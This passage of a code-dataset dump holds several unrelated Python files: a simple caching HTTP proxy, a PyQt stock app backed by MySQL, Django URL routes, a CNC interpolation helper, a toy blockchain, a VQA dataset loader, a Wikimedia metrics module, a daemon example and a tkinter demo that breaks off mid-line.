str_dominio,imag_str)\n\n\ndef main():\n while True:\n # parse the request URL\n conexao, addr = server.accept()\n requisicao = conexao.recv(350000) \n urlTratamento = requisicao.split()[1]\n urlTratamento_STR = str(urlTratamento)\n urlTratamento_ASPAS = urlTratamento_STR.split(\"'\")[1]\n urlTratamento_ASPAS_STR = str(urlTratamento_ASPAS)\n selec_imagem = urlTratamento_ASPAS_STR.split(\".\")\n imag_str = str(selec_imagem [-1])\n urlTratamento_BARRA = urlTratamento_ASPAS_STR.split('/')[1]\n urlTratamento_BARRA_STR = str(urlTratamento_BARRA)\n url_Complexa = urlTratamento_STR.split('/')\n url_Complexa_Divisao = url_Complexa[2:]\n str_dominio = urlTratamento_BARRA_STR.strip('')\n \n # handle favicon and image requests\n if(str_dominio == 'favicon.ico'):\n continue\n else:\n try:\n server_client.connect((str_dominio,80))\n except:\n pass\n\n if os.path.exists(str_dominio+imag_str):\n if str_dominio+imag_str == '_io.TextIOWrapper':\n continue\n else:\n carregamento_do_browser= ler_cache(str_dominio,imag_str)\n conexao.sendall(carregamento_do_browser.read().encode()) # send the cached text as bytes\n else: \n conexao_browser(str_dominio, url_Complexa_Divisao, urlTratamento, conexao, addr, imag_str)\n\nif __name__ == \"__main__\":\n main()
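\n\n# Note: timeInCache is read from argv above but never consulted. A minimal\n# sketch (hypothetical helper, not part of the original flow) of how a\n# freshness check could use it before serving from cache:\n#\n#   import time\n#   def cache_valida(caminho, max_age=float(timeInCache)):\n#       # compare the cache file's mtime against the configured lifetime\n#       return (time.time() - os.path.getmtime(caminho)) < max_age\n#\n# main() could call this before ler_cache() and fall back to\n# conexao_browser() when the cached copy has expired.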
","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"199450360","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtCore import *\r\nimport mysql.connector\r\nclass stokTedarik(QDialog):\r\n def __init__(self,parent=None):\r\n super(stokTedarik,self).__init__(parent)\r\n grid=QGridLayout()\r\n\r\n \r\n grid.addWidget(QLabel(\"Çikolata\"),0,0)\r\n grid.addWidget(QLabel(\"Peynir\"),1,0)\r\n grid.addWidget(QLabel(\"Tavuk\"),2,0)\r\n grid.addWidget(QLabel(\"Ekmek\"),3,0)\r\n grid.addWidget(QLabel(\"Süt\"),4,0)\r\n\r\n self.gofretSat=QLineEdit()\r\n self.peynirSat=QLineEdit()\r\n self.tavukSat=QLineEdit()\r\n self.ekmekSat=QLineEdit()\r\n self.sutSat=QLineEdit()\r\n\r\n self.gofretSip=QLineEdit()\r\n self.peynirSip=QLineEdit()\r\n self.tavukSip=QLineEdit()\r\n self.ekmekSip=QLineEdit()\r\n self.sutSip=QLineEdit()\r\n\r\n self.gofretAdet=QLabel()\r\n self.peynirAdet=QLabel()\r\n self.tavukAdet=QLabel()\r\n self.ekmekAdet=QLabel()\r\n self.sutAdet=QLabel()\r\n \r\n self.satisButon=QPushButton(\"SAT\") \r\n self.siparisButon=QPushButton(\"SİPARİŞ\")\r\n \r\n \r\n # add the widgets to the grid\r\n \r\n grid.addWidget(self.gofretSat,0,1)\r\n grid.addWidget(self.peynirSat,1,1)\r\n grid.addWidget(self.tavukSat,2,1)\r\n grid.addWidget(self.ekmekSat,3,1)\r\n grid.addWidget(self.sutSat,4,1)\r\n \r\n grid.addWidget(self.gofretSip,0,2)\r\n grid.addWidget(self.peynirSip,1,2)\r\n grid.addWidget(self.tavukSip,2,2)\r\n grid.addWidget(self.ekmekSip,3,2)\r\n grid.addWidget(self.sutSip,4,2)\r\n\r\n grid.addWidget(self.gofretAdet,0,3)\r\n grid.addWidget(self.peynirAdet,1,3)\r\n grid.addWidget(self.tavukAdet,2,3)\r\n grid.addWidget(self.ekmekAdet,3,3)\r\n grid.addWidget(self.sutAdet,4,3)\r\n\r\n grid.addWidget(self.satisButon,5,1) \r\n grid.addWidget(self.siparisButon,5,2) \r\n\r\n self.setLayout(grid)\r\n\r\n def sat(self):\r\n gofret=self.gofretAdet.text()\r\n baglanti=mysql.connector.connect(user=\"root\",password=\"\",host=\"127.0.0.1\",database=\"bimbucasube\")\r\n isaretci=baglanti.cursor()\r\n isaretci.execute('''SELECT * FROM stokyonetimi ''')\r\n row=isaretci.fetchall()#[[25]]\r\n for r in row:#[25]\r\n res=int(''.join(map(str,r)))#25\r\n res=res-1#24\r\n isaretci.execute('''SELECT * FROM stokyonetimi ''')\r\n gelenler=isaretci.fetchall()#[[can,111,515,515]]\r\n for row in gelenler:#[can,111,515,515]\r\n self.gofretAdet.setText(str(row[1]))#can\r\n self.peynirAdet.setText(str(row[2]))\r\n self.tavukAdet.setText(str(row[3]))\r\n self.ekmekAdet.setText(str(row[4]))\r\n self.sutAdet.setText(str(row[5]))\r\n \r\n baglanti.close()\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nuyg=QApplication([])\r\npencere=stokTedarik()\r\npencere.show()\r\nuyg.exec_()\r\n
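\r\n# A minimal sketch (assumed table/column names, not part of the original\r\n# homework) of how the stock decrement could be written with a parameterized\r\n# UPDATE instead of string formatting:\r\n#\r\n#   isaretci.execute(\"UPDATE stokyonetimi SET adet = adet - %s WHERE urun = %s\", (1, 'cikolata'))\r\n#   baglanti.commit()\r\n#\r\n# mysql.connector fills the %s placeholders itself, which avoids SQL injection\r\n# and the undefined-variable crash the original '''...''' % formatting caused.\r\n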
","sub_path":"odev emre.py","file_name":"odev emre.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"215167508","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns =[ \r\n path('',views.index, name='index'),\r\n path('userExercises', views.exerciseList, name='exercises'),\r\n path('exercise', views.apiExercise, name='apiExercise'),\r\n path('home',views.index, name = 'home'),\r\n path('session', views.session, name='workoutSession'),\r\n path('api/set', views.apiSet, name='apiSet'),\r\n path('api/session',views.apiSession, name='apiSession'),\r\n path('session_summary/', views.sessionSummary, name='sessionSummary'),\r\n path('api/individual', views.apiIndiv, name='apiIndiv'),\r\n path('api/signOut', views.signOut, name='apiSignOut'),\r\n path('history', views.historySummary, name='historySummary'),\r\n path('add_exercise', views.addExercise, name='addExercisePage'),\r\n path('api/exercise', views.apiExercise, name='apiExercise'),\r\n path('profile', views.profilePage, name='profilePage'),\r\n path('newProgram', views.planView, name ='planView'),\r\n path('api/program', views.apiProgram, name='apiProgram'),\r\n path('api/plannedSets', views.apiPlannedSets, name='apiPlannedSets'),\r\n path('userPrograms', views.programList, name='programList'),\r\n path('startProgram', views.startProgram, name='startProgram'),\r\n]\r\n","sub_path":"workouts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"636593559","text":"from math import fabs, sqrt, pow\r\n\r\n\"\"\"Compute the trajectory length for a linear move.\nInputs:\n1. Start point coordinates [x, y, z];\n2. end point coordinates [x, y, z].\nOutput:\n1. Trajectory length, mm (only the x and y components are used).\"\"\"\ndef LengthLinear(start, end):\r\n length = sqrt((pow((end[0]-start[0]), 2))+(pow((end[1]-start[1]), 2)))\r\n return length\r\n
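\r\n# Worked example (illustrative values): a move from [0, 0, 0] to [30, 40, 0]\r\n# spans sqrt(30**2 + 40**2) = 50.0 mm in the XY plane, so\r\n# LengthLinear([0, 0, 0], [30, 40, 0]) returns 50.0.\r\n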
\r\n\r\n# Linear interpolation\r\n\"\"\"Compute the tool motion along the coordinates.\nInputs:\n1. start point coordinates [x, y];\n2. end point coordinates [x, y];\n3. list of feed rates, mm/s;\n4. feed rate on the previous block, mm/s;\n5. block length, mm;\n6. sampling (interpolation) period, s.\nOutputs:\n1. list of X-axis coordinates, mm;\n2. list of Y-axis coordinates, mm;\n3. path length traversed by the interpolator, mm.\"\"\"\ndef InterpolationLinear(p_start, p_finish, vellist, vellast, length, tsam):\r\n S = 0\r\n x_list = []\r\n y_list = []\r\n x_list.append(p_start[0])\r\n y_list.append(p_start[1])\r\n x_tmp = p_start[0]\r\n y_tmp = p_start[1]\r\n for i in range (len(vellist)):\r\n # displacement covered in this sampling period\r\n if i == 0:\r\n Si = tsam*(vellist[i]+vellast)/2\r\n else:\r\n Si = tsam*(vellist[i]+vellist[i-1])/2\r\n # increments along each coordinate axis\r\n delta_x = Si*(fabs(p_finish[0]-p_start[0])/length)\r\n delta_y = Si*(fabs(p_finish[1]-p_start[1])/length)\r\n x_tmp += delta_x\r\n y_tmp += delta_y\r\n x_list.append(x_tmp)\r\n y_list.append(y_tmp)\r\n S += Si\r\n print(\"Длина пути по интерполятору: \" + str(S))\r\n return x_list, y_list, S\r\n","sub_path":"Старое новое/Interpolation.py","file_name":"Interpolation.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"146985967","text":"# Extracting the last element of the blockchain list\ndef get_last_value():\n return (blockchain[-1])\n\n# Appending the last element along with the current element in a block to the blockchain\ndef add_value(transaction_amount, last_transaction=[1]):\n blockchain.append([last_transaction, transaction_amount])\n\ndef get_transaction_value():\n user_value = float(input(\"Enter your transaction amount: \"))\n\n return user_value\n\ndef get_user_choice():\n\n user_input = input(\"Please give your choice here: \")\n\n return int(user_input)\n\ndef print_block():\n\n for block in blockchain:\n print(\"Here is your block\")\n print(block)\n\n# Returns false if manipulation has been done\ndef verify_chain():\n index = 0\n valid = True\n \n for block in blockchain:\n if index == 0:\n index += 1\n continue\n elif block[0] == blockchain[index-1]:\n valid = True\n else:\n valid = False\n break\n index += 1\n \n return valid\n\nblockchain = []\n\ntx_amount = get_transaction_value()\nadd_value(tx_amount)\n\nwhile True:\n print(\"Choose an option\")\n print(\"Choose 1 for adding a new transaction\")\n print(\"Choose 2 for printing the blockchain\")\n print(\"Choose 3 if you want to manipulate the data\")\n print(\"Choose anything else if you want to quit\")\n\n user_choice = get_user_choice()\n\n if user_choice == 1:\n tx_amount = get_transaction_value()\n add_value(tx_amount, get_last_value())\n\n elif user_choice == 2:\n print_block()\n\n elif user_choice == 3:\n if len(blockchain) >= 1:\n blockchain[0] = 2\n \n else: \n break\n\n if not verify_chain():\n print(\"Blockchain manipulated\")\n break","sub_path":"BCBasics.py","file_name":"BCBasics.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"491221135","text":"\"\"\"\nThis code is modified based on Jin-Hwa Kim's repository (Bilinear Attention Networks - https://github.com/jnhwkim/ban-vqa) by Xuan B. Nguyen\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport json\nimport _pickle as cPickle\nimport numpy as np\nimport utils\nimport torch\nfrom language_model import WordEmbedding\nfrom torch.utils.data import Dataset\nimport itertools\nimport warnings\nwith warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\",category=FutureWarning)\nCOUNTING_ONLY = False\n# Following Trott et al. 
(ICLR 2018)\n# Interpretable Counting for Visual Question Answering\ndef is_howmany(q, a, label2ans):\n if 'how many' in q.lower() or \\\n ('number of' in q.lower() and 'number of the' not in q.lower()) or \\\n 'amount of' in q.lower() or \\\n 'count of' in q.lower():\n if a is None or answer_filter(a, label2ans):\n return True\n else:\n return False\n else:\n return False\n\ndef answer_filter(answers, label2ans, max_num=10):\n for ans in answers['labels']:\n if label2ans[ans].isdigit() and max_num >= int(label2ans[ans]):\n return True\n return False\n\nclass Dictionary(object):\n def __init__(self, word2idx=None, idx2word=None):\n if word2idx is None:\n word2idx = {}\n if idx2word is None:\n idx2word = []\n self.word2idx = word2idx\n self.idx2word = idx2word\n\n @property\n def ntoken(self):\n return len(self.word2idx)\n\n @property\n def padding_idx(self):\n return len(self.word2idx)\n\n def tokenize(self, sentence, add_word):\n sentence = sentence.lower()\n if \"? -yes/no\" in sentence:\n sentence = sentence.replace(\"? -yes/no\", \"\")\n if \"? -open\" in sentence:\n sentence = sentence.replace(\"? -open\", \"\")\n if \"? - open\" in sentence:\n sentence = sentence.replace(\"? - open\", \"\")\n sentence = sentence.replace(',', '').replace('?', '').replace('\\'s', ' \\'s').replace('...', '').replace('x ray', 'x-ray').replace('.', '')\n words = sentence.split()\n tokens = []\n if add_word:\n for w in words:\n tokens.append(self.add_word(w))\n else:\n for w in words:\n # if a word is not in dictionary, it will be replaced with the last word of dictionary.\n tokens.append(self.word2idx.get(w, self.padding_idx-1))\n return tokens\n\n def dump_to_file(self, path):\n cPickle.dump([self.word2idx, self.idx2word], open(path, 'wb'))\n print('dictionary dumped to %s' % path)\n\n @classmethod\n def load_from_file(cls, path):\n print('loading dictionary from %s' % path)\n word2idx, idx2word = cPickle.load(open(path, 'rb'))\n d = cls(word2idx, idx2word)\n return d\n\n def add_word(self, word):\n if word not in self.word2idx:\n self.idx2word.append(word)\n self.word2idx[word] = len(self.idx2word) - 1\n return self.word2idx[word]\n\n def __len__(self):\n return len(self.idx2word)\n\ndef _create_entry(img, data, answer):\n if None!=answer:\n answer.pop('image_name')\n answer.pop('qid')\n entry = {\n 'qid' : data['qid'],\n 'image_name' : data['image_name'],\n 'image' : img,\n 'question' : data['question'],\n 'answer' : answer,\n 'answer_type' : data['answer_type'],\n 'question_type': data['question_type'],\n 'phrase_type' : data['phrase_type']}\n return entry\n\ndef is_json(myjson):\n try:\n json_object = json.loads(myjson)\n except ValueError:\n return False\n return True\n\ndef _load_dataset(dataroot, name, img_id2val, label2ans):\n \"\"\"Load entries\n\n img_id2val: dict {img_id -> val} val can be used to retrieve image or features\n dataroot: root path of dataset\n name: 'train', 'val', 'test'\n \"\"\"\n data_path = os.path.join(dataroot, name + 'set.json')\n samples = json.load(open(data_path))\n samples = sorted(samples, key=lambda x: x['qid'])\n\n answer_path = os.path.join(dataroot, 'cache', '%s_target.pkl' % name)\n answers = cPickle.load(open(answer_path, 'rb'))\n answers = sorted(answers, key=lambda x: x['qid'])\n\n utils.assert_eq(len(samples), len(answers))\n entries = []\n for sample, answer in zip(samples, answers):\n utils.assert_eq(sample['qid'], answer['qid'])\n utils.assert_eq(sample['image_name'], answer['image_name'])\n img_id = sample['image_name']\n if not COUNTING_ONLY or 
is_howmany(sample['question'], answer, label2ans):\n entries.append(_create_entry(img_id2val[img_id], sample, answer))\n\n return entries\n\nclass VQAFeatureDataset(Dataset):\n def __init__(self, name, args, dictionary, dataroot='data', question_len=12):\n super(VQAFeatureDataset, self).__init__()\n self.args = args\n assert name in ['train', 'test']\n dataroot = args.RAD_dir\n ans2label_path = os.path.join(dataroot, 'cache', 'trainval_ans2label.pkl')\n label2ans_path = os.path.join(dataroot, 'cache', 'trainval_label2ans.pkl')\n self.ans2label = cPickle.load(open(ans2label_path, 'rb'))\n self.label2ans = cPickle.load(open(label2ans_path, 'rb'))\n self.num_ans_candidates = len(self.ans2label)\n\n # End get the number of answer type class\n self.dictionary = dictionary\n\n # TODO: load img_id2idx\n self.img_id2idx = json.load(open(os.path.join(dataroot, 'imgid2idx.json')))\n\n self.entries = _load_dataset(dataroot, name, self.img_id2idx, self.label2ans)\n # load image data for MAML module\n if args.maml:\n # TODO: load images\n images_path = os.path.join(dataroot, 'images84x84.pkl')\n print('loading MAML image data from file: '+ images_path)\n self.maml_images_data = cPickle.load(open(images_path, 'rb'))\n # load image data for Auto-encoder module\n if args.autoencoder:\n # TODO: load images\n images_path = os.path.join(dataroot, 'images128x128.pkl')\n print('loading DAE image data from file: '+ images_path)\n self.ae_images_data = cPickle.load(open(images_path, 'rb'))\n # tokenization\n self.tokenize(question_len)\n self.tensorize()\n if args.autoencoder and args.maml:\n self.v_dim = args.feat_dim * 2\n else:\n self.v_dim = args.feat_dim\n def tokenize(self, max_length=12):\n \"\"\"Tokenizes the questions.\n\n This will add q_token in each entry of the dataset.\n -1 represent nil, and should be treated as padding_idx in embedding\n \"\"\"\n for entry in self.entries:\n tokens = self.dictionary.tokenize(entry['question'], False)\n tokens = tokens[:max_length]\n if len(tokens) < max_length:\n # Note here we pad in front of the sentence\n padding = [self.dictionary.padding_idx] * (max_length - len(tokens))\n tokens = tokens + padding\n utils.assert_eq(len(tokens), max_length)\n entry['q_token'] = tokens\n\n def tensorize(self):\n if self.args.maml:\n self.maml_images_data = torch.from_numpy(self.maml_images_data)\n self.maml_images_data = self.maml_images_data.type('torch.FloatTensor')\n if self.args.autoencoder:\n self.ae_images_data = torch.from_numpy(self.ae_images_data)\n self.ae_images_data = self.ae_images_data.type('torch.FloatTensor')\n for entry in self.entries:\n question = torch.from_numpy(np.array(entry['q_token']))\n entry['q_token'] = question\n\n answer = entry['answer']\n if None!=answer:\n labels = np.array(answer['labels'])\n scores = np.array(answer['scores'], dtype=np.float32)\n if len(labels):\n labels = torch.from_numpy(labels)\n scores = torch.from_numpy(scores)\n entry['answer']['labels'] = labels\n entry['answer']['scores'] = scores\n else:\n entry['answer']['labels'] = None\n entry['answer']['scores'] = None\n\n def __getitem__(self, index):\n entry = self.entries[index]\n question = entry['q_token']\n answer = entry['answer']\n answer_type = entry['answer_type']\n question_type = entry['question_type']\n phrase_type = entry['phrase_type']\n\n image_data = [0, 0]\n if self.args.maml:\n maml_images_data = self.maml_images_data[entry['image']].reshape(84*84)\n image_data[0] = maml_images_data\n if self.args.autoencoder:\n ae_images_data = 
self.ae_images_data[entry['image']].reshape(128*128)\n image_data[1] = ae_images_data\n\n if None!=answer:\n labels = answer['labels']\n scores = answer['scores']\n target = torch.zeros(self.num_ans_candidates)\n if labels is not None:\n target.scatter_(0, labels, scores)\n return image_data, question, target, answer_type, question_type, phrase_type\n\n else:\n return image_data, question, answer_type, question_type, phrase_type\n\n def __len__(self):\n return len(self.entries)\n\ndef tfidf_from_questions(names, args, dictionary, dataroot='data', target=['rad']):\n inds = [[], []] # rows, cols for uncoalesce sparse matrix\n df = dict()\n N = len(dictionary)\n if args.use_RAD:\n dataroot = args.RAD_dir\n def populate(inds, df, text):\n tokens = dictionary.tokenize(text, True)\n for t in tokens:\n df[t] = df.get(t, 0) + 1\n combin = list(itertools.combinations(tokens, 2))\n for c in combin:\n if c[0] < N:\n inds[0].append(c[0]); inds[1].append(c[1])\n if c[1] < N:\n inds[0].append(c[1]); inds[1].append(c[0])\n\n if 'rad' in target:\n for name in names:\n assert name in ['train', 'test']\n question_path = os.path.join(dataroot, name + 'set.json')\n questions = json.load(open(question_path))\n for question in questions:\n populate(inds, df, question['question'])\n\n # TF-IDF\n vals = [1] * len(inds[1])\n for idx, col in enumerate(inds[1]):\n assert df[col] >= 1, 'document frequency should be greater than zero!'\n vals[col] /= df[col]\n\n # Make stochastic matrix\n def normalize(inds, vals):\n z = dict()\n for row, val in zip(inds[0], vals):\n z[row] = z.get(row, 0) + val\n for idx, row in enumerate(inds[0]):\n vals[idx] /= z[row]\n return vals\n\n vals = normalize(inds, vals)\n\n tfidf = torch.sparse.FloatTensor(torch.LongTensor(inds), torch.FloatTensor(vals))\n tfidf = tfidf.coalesce()\n\n # Latent word embeddings\n emb_dim = 300\n glove_file = os.path.join(dataroot, 'glove', 'glove.6B.%dd.txt' % emb_dim)\n weights, word2emb = utils.create_glove_embedding_init(dictionary.idx2word[N:], glove_file)\n print('tf-idf stochastic matrix (%d x %d) is generated.' % (tfidf.size(0), tfidf.size(1)))\n\n return tfidf, weights\n\nif __name__=='__main__':\n # dictionary = Dictionary.load_from_file('data_RAD/dictionary.pkl')\n # tfidf, weights = tfidf_from_questions(['train'], None, dictionary)\n # w_emb = WordEmbedding(dictionary.ntoken, 300, .0, 'c')\n # w_emb.init_embedding(os.path.join('data_RAD', 'glove6b_init_300d.npy'), tfidf, weights)\n # with open('data_RAD/embed_tfidf_weights.pkl', 'wb') as f:\n # torch.save(w_emb, f)\n # print(\"Saving embedding with tfidf and weights successfully\")\n\n dictionary = Dictionary.load_from_file('data_RAD/dictionary.pkl')\n w_emb = WordEmbedding(dictionary.ntoken, 300, .0, 'c')\n with open('data_RAD/embed_tfidf_weights.pkl', 'rb') as f:\n w_emb = torch.load(f)\n print(\"Load embedding with tfidf and weights successfully\")\n","sub_path":"dataset_RAD.py","file_name":"dataset_RAD.py","file_ext":"py","file_size_in_byte":12039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"307111991","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Library/Python/2.7/site-packages/src/metrics/user_metric.py\n# Compiled at: 2013-01-30 13:44:04\n\"\"\"\n This module will be used to define Wikimedia Foundation user metrics. 
The\n Strategy behavioural pattern(http://en.wikipedia.org/wiki/Strategy_pattern)\n will be used to implement the metrics generation. In general the UserMetric\n type utilizes the process() function attribute to produce an internal list\n of metrics for a specified set of user handles (typically ID but user names\n may also be specified) passed to the method on call. The execution of\n process() produces a nested list that can be accessed via generator with\n an object call to __iter__().\n\n The class structure is generally as follows: ::\n\n class Metric(object):\n\n def __init__(self):\n # initialize base metric\n\n return\n\n def process(self):\n # base metric implementation\n\n return metric_value\n\n class DerivedMetric(Metric):\n\n def __init__(self):\n super(DerivedMetric, self)\n\n # initialize derived metric\n\n return\n\n def process(self):\n # derived metric implementation\n\n return metric_value\n\n These metrics will be used to support experimentation and measurement\n at the Wikimedia Foundation. The guidelines for this development may\n be found at https://meta.wikimedia.org/wiki/Research:Metrics.\n\n\"\"\"\n__author__ = 'Ryan Faulkner'\n__date__ = 'July 27th, 2012'\n__license__ = 'GPL (version 2 or later)'\nimport src.etl.data_loader as dl, MySQLdb\nfrom collections import namedtuple\nfrom dateutil.parser import parse as date_parse\nfrom datetime import datetime, timedelta\n\ndef pre_metrics_init(init_f):\n \"\"\" Decorator function for subclassed metrics __init__ \"\"\"\n\n def wrapper(self, **kwargs):\n self.append_params(UserMetric)\n self.apply_default_kwargs(kwargs, 'init')\n init_f(self, **kwargs)\n\n return wrapper\n\n\nMETRIC_AGG_METHOD_FLAG = 'metric_agg_flag'\nMETRIC_AGG_METHOD_HEAD = 'metric_agg_head'\nMETRIC_AGG_METHOD_NAME = 'metric_agg_name'\nMETRIC_AGG_METHOD_KWARGS = 'metric_agg_kwargs'\naggregate_data_class = namedtuple('AggregateData', 'header data')\n\ndef aggregator(agg_method, metric, data_header):\n \"\"\" Method for wrapping and executing aggregated data \"\"\"\n if hasattr(agg_method, METRIC_AGG_METHOD_FLAG) and getattr(agg_method, METRIC_AGG_METHOD_FLAG):\n agg_header = getattr(agg_method, METRIC_AGG_METHOD_HEAD) if hasattr(agg_method, METRIC_AGG_METHOD_HEAD) else 'No header specified.'\n kwargs = getattr(agg_method, METRIC_AGG_METHOD_KWARGS) if hasattr(agg_method, METRIC_AGG_METHOD_KWARGS) else {}\n data = [\n getattr(agg_method, METRIC_AGG_METHOD_NAME)] + agg_method(metric, **kwargs)\n else:\n agg_header = [\n 'type'] + [ data_header[i] for i in metric._agg_indices[agg_method.__name__]\n ]\n data = [agg_method.__name__] + agg_method(metric.__iter__(), metric._agg_indices[agg_method.__name__])\n return aggregate_data_class(agg_header, data)\n\n\nclass UserMetric(object):\n ALL_NAMESPACES = 'all_namespaces'\n DATETIME_STR_FORMAT = '%Y%m%d%H%M%S'\n DEFAULT_DATA_RANGE = 14\n _data_model_meta = dict()\n _agg_indices = dict()\n _param_types = {'init': {'date_start': [\n 'str|datetime', 'Earliest date metric is measured.',\n datetime.now() + timedelta(DEFAULT_DATA_RANGE)], \n 'date_end': [\n 'str|datetime', 'Latest date metric is measured.',\n datetime.now()], \n 'project': [\n 'str', 'The project (language) being inspected.',\n 'enwiki'], \n 'namespace': [\n 'int|set', 'The namespace over which the metric is computed.',\n 0]}, \n 'process': {}}\n\n def apply_default_kwargs(self, kwargs, arg_type):\n \"\"\" Apply parameter defaults where necessary \"\"\"\n if hasattr(kwargs, '__iter__') and arg_type in self._param_types:\n for k in 
self._param_types[arg_type]:\n if k not in kwargs or not kwargs[k]:\n kwargs[k] = self._param_types[arg_type][k][2]\n\n def __init__(self, **kwargs):\n self._data_source_ = dl.Connector(instance='slave')\n self._results = list()\n self._start_ts_ = self._get_timestamp(kwargs['date_start'])\n self._end_ts_ = self._get_timestamp(kwargs['date_end'])\n self._project_ = kwargs['project']\n namespace = kwargs['namespace']\n if not namespace == self.ALL_NAMESPACES:\n if not hasattr(namespace, '__iter__'):\n namespace = [namespace]\n self._namespace_ = set(namespace)\n else:\n self._namespace_ = namespace\n\n def __str__(self):\n return ('\\n').join([str(self._data_source_._db_),\n str(self.__class__),\n str(self._namespace_),\n self._project_])\n\n def __iter__(self):\n return (r for r in self._results)\n\n def __del__(self):\n if hasattr(self, '_data_source_') and hasattr(self._data_source_, 'close_db'):\n self._data_source_.close_db()\n\n def append_params(self, class_ref):\n \"\"\" Append params from class reference \"\"\"\n if hasattr(class_ref, '_param_types'):\n for k, v in class_ref._param_types['init'].iteritems():\n self.__class__._param_types['init'][k] = v\n\n for k, v in class_ref._param_types['process'].iteritems():\n self.__class__._param_types['process'][k] = v\n\n @property\n def date_start(self):\n return self._start_ts_\n\n @property\n def date_end(self):\n return self._end_ts_\n\n @classmethod\n def _construct_data_point(cls):\n return namedtuple(cls.__name__, cls.header())\n\n @classmethod\n def _get_timestamp(cls, ts_representation):\n \"\"\"\n Helper method. Takes a representation of a date object (String or\n datetime.datetime object) and formats as a timestamp:\n \"YYYY-MM-DD HH:II:SS\"\n\n - Parameters:\n - *date_representation* - String or datetime. A formatted\n timestamp representation\n\n - Return:\n - String. Timestamp derived from argument in format\n \"YYYY-MM-DD HH:II:SS\".\n \"\"\"\n try:\n datetime_obj = date_parse(ts_representation[:19])\n except AttributeError:\n datetime_obj = ts_representation\n except TypeError:\n datetime_obj = ts_representation\n\n try:\n timestamp = datetime_obj.strftime(cls.DATETIME_STR_FORMAT)\n return timestamp\n except ValueError:\n raise cls.UserMetricError(message='Could not parse timestamp: %s' % datetime_obj.__str__())\n\n @classmethod\n def _escape_var(cls, var):\n \"\"\"\n Escapes either elements of a list (recursively visiting elements)\n or a single variable. The variable is cast to string before being\n escaped.\n\n - Parameters:\n - **var**: List or string. Variable or list (potentially\n nested) of variables to be escaped.\n\n - Return:\n - List or string. 
escaped elements.\n \"\"\"\n if hasattr(var, '__iter__'):\n escaped_var = list()\n for elem in var:\n escaped_var.append(cls._escape_var(elem))\n\n return escaped_var\n return MySQLdb.escape_string(str(var))\n\n @classmethod\n def _format_namespace(cls, namespace):\n ns_cond = ''\n if hasattr(namespace, '__iter__'):\n if len(namespace) == 1:\n ns_cond = 'page_namespace = ' + str(namespace.pop())\n else:\n ns_cond = 'page_namespace in (' + (',').join(dl.DataLoader().cast_elems_to_string(list(namespace))) + ')'\n return ns_cond\n\n @staticmethod\n def header():\n raise NotImplementedError\n\n @staticmethod\n def pre_process_users(proc_func):\n\n def wrapper(self, users, **kwargs):\n if hasattr(users, 'get_users'):\n users = [ u for u in users.get_users(self._start_ts_, self._end_ts_) ]\n return proc_func(self, users, **kwargs)\n\n return wrapper\n\n def process(self, users, **kwargs):\n raise NotImplementedError()\n\n class UserMetricError(Exception):\n \"\"\" Basic exception class for UserMetric types \"\"\"\n\n def __init__(self, message='Unable to process results using strategy.'):\n Exception.__init__(self, message)","sub_path":"pycfiles/wmf_user_metrics-0.1.1.macosx-10.7-intel.tar/user_metric.py","file_name":"user_metric.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"69087301","text":"# -*- coding: utf-8 -*-\n# http://ymotongpoo.hatenablog.com/entry/20111217/1324125102\n\nimport time\nfrom datetime import datetime\nimport os,sys,lockfile\nimport daemon\n\ndef daemon_process():\n while True:\n print( \"pid: %d, ppid: %d, time: %s\" %\n (os.getpid(), os.getppid(), datetime.now()) )\n sys.stdout.flush()\n time.sleep(5)\n\nworking_dir = os.path.abspath(os.path.dirname(__file__))\n\ncontext = daemon.DaemonContext(\n working_directory = working_dir,\n stdout = open(\"stdout_file.txt\", \"w+\"),\n stderr = open(\"stderr_file.txt\", \"w+\")\n)\n\nif __name__ == '__main__':\n with context:\n daemon_process()\n","sub_path":"python/daemon/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576247875","text":"import tkinter as tk\n\ncounter = 0\n\nstyles = [dict(bg=\"azure\", fg=\"#333333\"), dict(fg=\"white\", bg=\"black\")]\n\ndef add_label(Event=None):\n\n global counter\n name = user_entry.get()\n if len(name) < 3:\n hint.configure(text=\"Введите хотябы три символа\")\n return\n\n user_entry.delete(0, tk.END)\n new_label = tk.Label(window, text=name, pady=\"10\")\n new_label.configure(styles[counter%2])\n if counter >= 5:\n counter = 0\n children = window.winfo_children()\n for element in filter(lambda x: isinstance(x, tk.Label) and x.winfo_name() not in ('!label1', '!label2') != '!label', children):\n element.destroy()\n\n new_label.pack(fill=tk.X)\n\n counter += 1\n\n\n\nwindow = tk.Tk()\n\nwindow.geometry(\"400x500\")\n\nwindow.resizable(False, False)\n\nuser_entry = tk.Entry(window, width=\"60\")\nuser_entry.pack()\nuser_entry.focus_set()\n\ntk.Button(window, text=\"Beech\", command=add_label).pack()\n\nhint = tk.Label(window, text=\"Введите хотябы три символа\", fg=\"indian red\", font=(\"Time New Roman\", 10))\nhint.pack()\n\n# tk.Label(window, text=\"Тыч в 